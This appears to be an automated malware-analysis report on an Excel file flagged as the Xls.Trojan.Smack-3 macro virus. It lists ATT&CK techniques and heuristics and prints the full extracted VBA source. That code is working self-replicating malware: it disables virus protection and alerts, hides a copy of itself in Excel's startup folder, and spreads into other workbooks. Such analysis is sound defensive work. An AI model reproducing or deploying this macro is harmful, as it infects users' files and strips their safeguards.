Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically an Auto_Open subroutine, which is a common technique for executing malicious code upon opening a document. The macro attempts to disable security features and manipulate application settings. While the full payload is truncated, the presence of the Auto_Open macro and the ClamAV detection strongly suggest malicious intent, likely as a spearphishing attachment.
Heuristics (3)
- ClamAV: Xls.Trojan.Smack-3 (severity: critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Smack-3
- VBA macros detected (severity: medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Auto_Open macro (severity: high, OLE_VBA_AUTO): Auto_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3045 bytes |

SHA-256: 64daa78cd8f9fb7d4c77ba1ae28ae93fcbeddcf1281a36d61f1c679e78387c66

Detection:
- ClamAV: Xls.Trojan.Smack-3
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "Smack"
'Hey people, I'm new here..
'Do you know my name?
'The name's XM97.Smack!!!
'Heh... now you're seeing my code eh..
'OK, you got me...
'Come on, kill me!!!
'Ummm, on second thought...
'Please don't kill me, Pretty PLEASE..
'PLEASE DON'T KILL ME
'I want to live forever...
'Forever Young!
'Heheh
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    Application.ScreenUpdating = False
    Application.DisplayStatusBar = False
    Application.DisplayAlerts = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Options.VirusProtection = False
    MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
    MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
    MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
    MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
    MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
    If Not IsGlobalInfected() Then
        Aaaaahhhh
    End If
    Application.OnSheetActivate = "XLDATA.XLM!Smack1"
    If (Day(Now) = "10") And (Month(Now) = "9") Then
        MsgBox "You know what?" & Chr$(13) & "You're getting OLD, man!!!", , "Smack!!!"
    End If
End Sub
Function IsGlobalInfected() As Boolean
Attribute IsGlobalInfected.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Smack_3
    IsGlobalInfected = False
    For A = 1 To Application.Workbooks.Count
        If Application.Workbooks(A).Name = "XLDATA.XLM" Then
            For b = 1 To Application.Workbooks("XLDATA.XLM").Modules.Count
                If Application.Workbooks("XLDATA.XLM").Modules(b).Name = "Smack" Then
                    IsGlobalInfected = True
                End If
            Next b
        End If
    Next A
Smack_3:
End Function
Function Aaaaahhhh()
Attribute Aaaaahhhh.VB_ProcData.VB_Invoke_Func = " \n14"
    ab = ActiveWorkbook.Name
    Workbooks(ab).SaveCopyAs Application.StartupPath + "\XLDATA.XLM"
    Workbooks.Open (Application.StartupPath + "\XLDATA.XLM")
    Windows("XLDATA.XLM").Visible = False
    Application.Workbooks("XLDATA.XLM").Save
End Function
Function DocIsInfected() As Boolean
Attribute DocIsInfected.VB_ProcData.VB_Invoke_Func = " \n14"
    abc = ActiveWorkbook.Name
    DocIsInfected = False
    For y = 1 To Application.Workbooks(abc).Modules.Count
        If Application.Workbooks(abc).Modules(y).Name = "Smack" Then
            DocIsInfected = True
        End If
    Next y
End Function
Sub Smack1()
Attribute Smack1.VB_ProcData.VB_Invoke_Func = " \n14"
    abcd = ActiveWorkbook.Name
    If Not DocIsInfected() Then
        Application.ScreenUpdating = False
        Application.Windows("XLDATA.XLM").Visible = True
        Workbooks("XLDATA.XLM").Activate
        Sheets("smack").Visible = True
        Workbooks("XLDATA.XLM").Sheets("Smack").Copy Before:=Workbooks(abcd).Sheets(1)
        Workbooks(abcd).Sheets("Smack").Visible = False
        Workbooks("XLDATA.XLM").Sheets("Smack").Visible = False
        Application.Windows("XLDATA.XLM").Visible = False
    End If
    Close
End Sub
```